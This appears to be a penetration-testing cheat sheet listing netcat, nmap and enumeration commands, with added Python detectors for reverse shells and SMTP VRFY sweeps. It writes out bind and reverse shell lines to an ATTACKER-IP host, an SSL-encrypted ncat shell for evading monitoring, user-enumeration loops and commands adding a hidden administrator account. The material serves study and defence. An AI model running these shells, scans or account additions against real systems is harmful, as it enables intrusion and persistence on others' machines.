# Basic Commands and Tools

### File/Directory Search

```
# find / -name "musana*" -type [d,f] -exec file {} \;
```

### Services

```
# service [apache2, ssh, postgresql] [start,restart,stop]

# /etc/init.d/apache2 restart
```

> Making services persistent (auto-start even after a reboot):

```
# update-rc.d ssh enable
# update-rc.d apache2 enable
# rcconf (manage via GUI)
```

### Bash

```
# cat index.html | grep "href=" | cut -d "/" -f 3 | grep "domain\.com" | cut -d '"' -f 1

# for url in $(cat ip.txt); do host $url; done

# for ip in $(seq 130 160); do ping -c 1 192.168.1.$ip; done
```
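The `grep "href=" | cut ...` pipeline above pulls hostnames out of link targets, but `cut -d "/" -f 3` only works when every href is an absolute URL on its own line; relative links, `mailto:` links and several links on one line all produce garbage. The following Python version is an added example, not part of the original page, and does the same job with a real HTML parser. The sample HTML and its hostnames are constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page; every href below is made up for this example.
SAMPLE_HTML = """
<html><body>
<a href="https://www.domain.com/login">Login</a>
<a href="http://mail.domain.com:8080/inbox">Mail</a>
<a href="/relative/path">Relative</a>
<a href='https://cdn.otherdomain.net/lib.js'>CDN</a>
<a href="https://www.domain.com/about">About</a>
<a href="mailto:admin@domain.com">Contact</a>
</body></html>
"""


class HrefCollector(HTMLParser):
    """Collect the value of every href attribute, whatever the tag or quoting style."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name.lower() == "href" and value:
                self.hrefs.append(value)


def hostnames_from_html(html, suffix=None):
    """Return the sorted, de-duplicated hostnames referenced by href links.

    Relative links (no host) and non-web schemes are skipped.  With
    suffix="domain.com" only that domain and its subdomains are kept, which is
    what the grep "domain\\.com" stage did in the shell pipeline.
    """
    collector = HrefCollector()
    collector.feed(html)
    hosts = set()
    for href in collector.hrefs:
        parsed = urlparse(href)
        if parsed.scheme not in ("http", "https") or not parsed.hostname:
            continue  # relative path, mailto:, javascript:, ...
        host = parsed.hostname.lower()  # port number is already stripped off
        if suffix and not (host == suffix or host.endswith("." + suffix)):
            continue
        hosts.add(host)
    return sorted(hosts)


if __name__ == "__main__":
    print(hostnames_from_html(SAMPLE_HTML))
    print(hostnames_from_html(SAMPLE_HTML, suffix="domain.com"))
```

To run it against a saved page, replace `SAMPLE_HTML` with the contents of `index.html`; the suffix check deliberately requires a dot boundary so that `notdomain.com` is not matched the way a bare `grep` would.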

## Tools

### rdesktop

```
# rdesktop -u offsec -p Password IP
```

### Netcat

Banner grabbing:

```
# nc -nv IP PORT
```

File transfer:

```
# nc -nv IP PORT </usr/share/wordlist/test.txt (sender)

# nc -nvlp PORT > incoming.txt (receiver)
```

#### Command execution

**Scenario 1**: Used when the victim machine reaches the internet directly over a public IP address. No port forwarding is needed on the victim side. If the attacker is behind a firewall/NAT, this scenario also means no port forwarding is needed on the attacker's side. (Bind shell)

```
# nc IP PORT (Attacker Machine)

# nc -vlp PORT -e cmd.exe (Victim Machine)
```

**Scenario 2**: If the victim machine is behind a firewall/NAT, the attacker instead listens on a port on their own side (the attacker must either reach the internet with a public IP address or set up port forwarding). The attacker then sends a reverse shell request from the victim machine back to their own machine.

```
# nc -vlp PORT (Attacker Machine)

# nc ATTACKER-IP PORT -e /bin/bash (Victim Machine)
```
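From the defender's side, the two scenarios above leave two different footprints in the socket table: a bind shell is a netcat process in `LISTEN` state, and a reverse shell is a shell process whose standard input/output/error descriptors are the established socket itself (the shape `-e /bin/bash` produces). The following Python snippet is an added example, not part of the original page; it parses `ss -tnp`-style lines and flags both patterns. The sample output, addresses and PIDs are constructed for the example.

```python
import re

# One line of `ss -tnp` output: State Recv-Q Send-Q Local Peer users:(...)
SS_LINE = re.compile(
    r"^(?P<state>\S+)\s+\d+\s+\d+\s+(?P<local>\S+)\s+(?P<peer>\S+)\s+users:\(\((?P<procs>.*)\)\)$"
)
# One ("name",pid=N,fd=M) entry inside the users:(...) field
PROC = re.compile(r'"(?P<name>[^"]+)",pid=(?P<pid>\d+),fd=(?P<fd>\d+)')

NETCAT = {"nc", "ncat", "netcat"}
SHELLS = {"sh", "bash", "dash", "zsh", "cmd.exe", "powershell.exe"}

# Constructed sample output; addresses, ports and PIDs are made up for this example.
SAMPLE_SS = """\
ESTAB  0  0  192.168.1.20:22     192.168.1.5:53110  users:(("sshd",pid=812,fd=4))
LISTEN 0  1  0.0.0.0:4444        0.0.0.0:*          users:(("nc",pid=2231,fd=3))
ESTAB  0  0  192.168.1.20:51522  203.0.113.9:443    users:(("bash",pid=2290,fd=0),("bash",pid=2290,fd=1),("bash",pid=2290,fd=2))
ESTAB  0  0  192.168.1.20:80     192.168.1.7:40022  users:(("apache2",pid=600,fd=12))
"""


def parse_ss(text):
    """Turn ss -tnp lines into dicts; lines without a process field are skipped."""
    rows = []
    for line in text.splitlines():
        m = SS_LINE.match(line.strip())
        if not m:
            continue
        procs = [(p["name"], int(p["pid"]), int(p["fd"])) for p in PROC.finditer(m["procs"])]
        rows.append({"state": m["state"], "local": m["local"], "peer": m["peer"], "procs": procs})
    return rows


def find_shell_sockets(text):
    """Return one finding per suspicious (socket, process) pair."""
    findings = []
    for row in parse_ss(text):
        by_pid = {}
        for name, pid, fd in row["procs"]:
            by_pid.setdefault(pid, (name, set()))[1].add(fd)
        for pid, (name, fds) in by_pid.items():
            base = {"pid": pid, "process": name, "local": row["local"], "peer": row["peer"]}
            if row["state"] == "LISTEN" and name in NETCAT:
                # Scenario 1 footprint: netcat waiting for an inbound connection.
                findings.append({"kind": "bind", **base})
            elif row["state"] == "ESTAB" and name in SHELLS and fds & {0, 1, 2}:
                # Scenario 2 footprint: an interactive shell talking directly to a socket.
                findings.append({"kind": "reverse", **base})
            elif row["state"] == "ESTAB" and name in NETCAT:
                # Netcat in a live session (file transfer or relay); worth a look either way.
                findings.append({"kind": "netcat-session", **base})
    return findings


if __name__ == "__main__":
    for f in find_shell_sockets(SAMPLE_SS):
        print(f"{f['kind']:15} pid={f['pid']} {f['process']} {f['local']} -> {f['peer']}")
```

On a live host, feed it `subprocess.run(["ss", "-tnp"], capture_output=True, text=True).stdout` (root is needed to see other users' processes); the check is deliberately process-based rather than port-based, because the listener port in the scenarios above is whatever the attacker chose.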

### Ncat

Developed by the nmap project. It has some features for evading security devices: plain nc sends everything in clear text, whereas ncat can encrypt the data in transit. (Bind shell)

```
# ncat -v IP PORT --ssl (Attacker Machine)

# ncat -vlp PORT -e cmd.exe --allow ATTACKER-IP --ssl (Victim Machine)
```

## Passive Info Gathering

GHDB (Google Hacking Database):

```
 site:"sitename.com"
 filetype:pdf
 intitle:"Index Of"
 inurl:"admin.php"
 intext:"admin password"
```

## Active Info Gathering

```
host -t [ns,a,mx,cname,txt] musana.net
```

DNS lookup: finding the IP address from a domain name.

Reverse DNS lookup: finding the other domains hosted on an IP address.

### Zone transfer

```
# host -l musana.net ns1.musana.net
```

### Nmap

```
# nmap IP

# nmap -sn IP (ICMP scan, ping sweep, no port scan)

# nmap -sT --top-ports 20 IP (TCP connect scan, 20 most commonly used ports)

# nmap -A IP (get banner, version, os detect, port scan)

# nmap --script "*iis*" IP

# nmap --script "*smb*" -p 139,445 IP

# nmap -p 139,445 IP --open (SMB Scan)

# nmap -p 139,445 --script=smb-check-vulns --script-args=unsafe=1 IP (***)

# locate "*.nse" | grep smb

# nmap -v -p 80 --script http-vuln-cve2010-2861 IP (Directory Traversal)

# nmap -v -p 80 --script all IP (runs every script)
```

### nbtscan

NetBIOS name information

```
# nbtscan 192.168.2.0/24
```

### rpcclient

```
# rpcclient -U "" IP (empty password)
rpcclient $> getdompwinfo (get password policy)
```

### enum4linux

Enum4linux is a tool for enumerating information from Windows and Samba systems.

```
# enum4linux -v IP
```

### SMTP

```
# nc -nv IP 25 (banner info)
VRFY bob (250: user exists)
VRFY dontexist (550: user does not exist)
```

**SMTP user enumeration**:

`# for user in $(cat users.txt); do echo VRFY $user | nc -nv IP 25 2>/dev/null | grep "^250"; done`

**To do**: add a Python script.
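The VRFY loop above is easy to spot on the mail server side: one client sending VRFY for many different names in a short burst, with the 250/550 split telling it which names exist. The following Python detector is an added example, not part of the original page or any mail server's code; it works on a constructed log format (one line per VRFY with client, argument and reply code) because real MTA log formats vary, so the regex would need adjusting for a real log. The sample lines, addresses and names are made up.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log format for this example (not any real MTA's format):
#   <ISO timestamp> smtp[<pid>]: client=<ip> cmd=VRFY arg=<name> code=<reply>
LOG_LINE = re.compile(
    r"^(?P<ts>\S+) smtp\[\d+\]: client=(?P<ip>\S+) cmd=VRFY arg=(?P<arg>\S+) code=(?P<code>\d{3})$"
)

# Constructed sample log: one client sweeping six names in three seconds,
# one legitimate single VRFY, and one later isolated VRFY from the first client.
SAMPLE_LOG = """\
2024-03-01T10:00:01 smtp[1201]: client=10.0.0.5 cmd=VRFY arg=bob code=250
2024-03-01T10:00:01 smtp[1201]: client=10.0.0.5 cmd=VRFY arg=alice code=550
2024-03-01T10:00:02 smtp[1201]: client=10.0.0.5 cmd=VRFY arg=carol code=550
2024-03-01T10:00:02 smtp[1201]: client=10.0.0.5 cmd=VRFY arg=dave code=550
2024-03-01T10:00:03 smtp[1201]: client=10.0.0.5 cmd=VRFY arg=erin code=550
2024-03-01T10:00:03 smtp[1201]: client=10.0.0.5 cmd=VRFY arg=frank code=250
2024-03-01T10:05:00 smtp[1207]: client=192.168.1.40 cmd=VRFY arg=postmaster code=250
2024-03-01T11:30:00 smtp[1300]: client=10.0.0.5 cmd=VRFY arg=root code=250
"""


def parse_vrfy(text):
    """Return (timestamp, client, name, code) tuples for every VRFY line."""
    events = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if m:
            events.append((datetime.fromisoformat(m["ts"]), m["ip"], m["arg"], m["code"]))
    return events


def detect_vrfy_sweeps(text, gap=timedelta(seconds=60), threshold=5):
    """Alert on clients that VRFY >= threshold distinct names in one burst.

    A burst is a run of VRFYs from the same client with no more than `gap`
    between consecutive commands.  The alert records which names the server
    confirmed (code 250), i.e. what the client learned.
    """
    per_client = defaultdict(list)
    for ev in sorted(parse_vrfy(text)):
        per_client[ev[1]].append(ev)

    alerts = []
    for ip, evs in per_client.items():
        burst = [evs[0]]
        for ev in evs[1:] + [None]:  # None flushes the final burst
            if ev is not None and ev[0] - burst[-1][0] <= gap:
                burst.append(ev)
                continue
            names = {e[2] for e in burst}
            if len(names) >= threshold:
                alerts.append({
                    "client": ip,
                    "attempts": len(names),
                    "confirmed": sorted({e[2] for e in burst if e[3] == "250"}),
                    "first": burst[0][0],
                    "last": burst[-1][0],
                })
            if ev is not None:
                burst = [ev]
    return alerts


if __name__ == "__main__":
    for a in detect_vrfy_sweeps(SAMPLE_LOG):
        print(f"{a['client']}: {a['attempts']} names probed {a['first']}..{a['last']}, confirmed={a['confirmed']}")
```

The threshold of five distinct names per minute is an assumption for the example; tune it to the server's real traffic. The cheaper fix is to not answer VRFY at all (in Postfix, `disable_vrfy_command = yes`), after which the loop above only ever sees rejections.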

### smbclient

```
# smbclient -N -L IP
```

### SNMP

> Used for managing network devices. UDP based, so source IP spoofing is possible. Clear text. Weak authentication. Reflection attacks. Port: 161

```
# nmap -sU --open -p 161 IP
# onesixtyone -c community -i <ip.txt>
# snmpwalk -c public -v1 IP (for a weak community string)
# snmpwalk -c public -v1 IP MIB-VALUE (running processes)
# snmpwalk -c public -v1 IP MIB-VALUE (open ports)
# snmpwalk -c public -v1 IP MIB-VALUE (installed software)
```

> snmpenum or snmpcheck (other tools)

## Vulnerability Scanning

\*\* SLMail RCE exploit.

TFTP: UDP-based file transfer protocol. Windows 2003/XP/7. Port 69.

## Privilege Escalation

### Linux

```
# cat /etc/issue (distro info)
# uname -a (kernel info)
```

> mempodipper - Linux root exploit for kernels >= 2.6.39, x64 and x86. Build with `gcc exploit.c -o exploit`.

### Windows

> ms11-080 afd.sys privilege escalation exploit; Group Policy .bak files
>
> ```
> # net user test test /add
> # net localgroup administrators test /add
> # net localgroup "Remote Desktop Users" test /add
> ```

